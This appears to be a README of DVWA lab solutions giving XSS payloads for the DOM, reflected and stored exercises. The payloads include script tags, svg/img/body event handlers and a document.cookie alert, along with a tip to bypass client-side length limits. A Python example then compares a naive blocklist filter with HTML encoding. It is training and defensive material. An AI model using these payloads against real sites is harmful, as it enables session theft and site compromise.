
XSS-DVWA-SOLUTION

Welcome to the DVWA XSS Solutions repository! This repository contains comprehensive solutions for Cross-Site Scripting (XSS) vulnerabilities in the Damn Vulnerable Web Application (DVWA). These solutions are meticulously provided by Nihar Rathod, also known as BugBot19

Overview

The Damn Vulnerable Web Application (DVWA) is a popular web application designed for security professionals and enthusiasts to practice their web security skills in a legal and safe environment. This repository focuses on addressing and mitigating XSS vulnerabilities, one of the most common and critical web security issues.


XSS (DOM)

A DOM-based cross-site scripting (XSS) attack happens when a threat actor modifies the Document Object Model (DOM) environment in the victim's browser. The HTML served by the application does not change; instead, the client-side code runs with attacker-influenced input and executes differently.

LOW

Payload - <script>alert('BugBot19 was here')</script>


MEDIUM

Payload - <script>alert('BugBot19 was here')</script>


HIGH

Payload - <script>alert('BugBot19 was here')</script>


XSS (Reflected)

Reflected XSS is a kind of cross-site scripting attack in which a malicious script is injected into a website that is trusted or otherwise benign and echoed straight back in the response. Typically, the injection occurs when an unsuspecting user clicks on a link that is specifically designed to attack the website they are visiting.

LOW/MEDIUM/HIGH

During the research phase, I found out that one of the payloads can be used in all three levels; the payload is mentioned below.

Payload - <svg onload=alert('BugBot19 was here')>


XSS (Stored)

Stored XSS, also known as persistent XSS, is the more damaging of the two: the malicious script is injected directly into the vulnerable web application and saved, so it is served to every user who later views the affected page. Reflected XSS, by contrast, involves reflecting a malicious script off of a web application onto a single user's browser.

Low

Payload - <script>alert(document.domain)</script>


Medium

Payload - <img src=x onerror=alert(document.cookie)>

Change the input field's 'size' and 'maxlength' attributes so the payload fits; this length limit is only enforced on the client side.


High

Payload - <body onload=alert('Bugbot19')>

Change the input field's 'size' and 'maxlength' attributes so the payload fits; this length limit is only enforced on the client side.
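To show why the payloads in this README defeat tag-stripping filters while output encoding stops all of them, here is an added example (my own Python, not DVWA's PHP or the author's code). It runs every payload above through a naive blocklist that only removes the literal `<script>` tag (constructed to model the blocklist approach, not DVWA's actual filter) and through context-aware HTML entity encoding; a small regex stands in for "the browser would execute this" and is an assumed heuristic for the example only.

```python
import html
import re

# Payloads quoted in this README, used here as constructed test inputs.
PAYLOADS = [
    "<script>alert('BugBot19 was here')</script>",
    "<svg onload=alert('BugBot19 was here')>",
    "<script>alert(document.domain)</script>",
    "<img src=x onerror=alert(document.cookie)>",
    "<body onload=alert('Bugbot19')>",
]

# Heuristic stand-in for "the browser would run this": a real <script> tag or
# any real tag carrying an on*= event handler. Assumed for this example only.
EXECUTABLE = re.compile(r"<\s*(?:script\b|[a-z][^>]*\bon[a-z]+\s*=)", re.IGNORECASE)


def blocklist_filter(value: str) -> str:
    """Weak mitigation: delete the literal '<script>' tag and nothing else.
    Constructed to model the blocklist approach, not DVWA's own filter."""
    return value.replace("<script>", "")


def encode_for_html(value: str) -> str:
    """Correct mitigation for an HTML body context: entity-encode the value so
    '<', '>', '&' and quotes are rendered as text instead of parsed as markup."""
    return html.escape(value, quote=True)


def render_greeting(mitigation, name: str) -> str:
    """Build the HTML fragment a greeting page would emit after the mitigation."""
    return "<pre>Hello " + mitigation(name) + "</pre>"


def still_executable(fragment: str) -> bool:
    """True if the rendered fragment still contains a live script tag or handler."""
    return EXECUTABLE.search(fragment) is not None


def evaluate(mitigation) -> dict:
    """Map each payload to True if it still executes after the mitigation."""
    return {p: still_executable(render_greeting(mitigation, p)) for p in PAYLOADS}


if __name__ == "__main__":
    for label, fn in (("blocklist", blocklist_filter), ("encode", encode_for_html)):
        survivors = [p for p, alive in evaluate(fn).items() if alive]
        print(f"{label}: {len(survivors)}/{len(PAYLOADS)} payloads still executable")
        for p in survivors:
            print("   ", p)
```

The blocklist leaves the three event-handler payloads (svg, img, body) fully executable, which is exactly why the `<svg onload=...>` payload works across levels; encoding leaves none.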

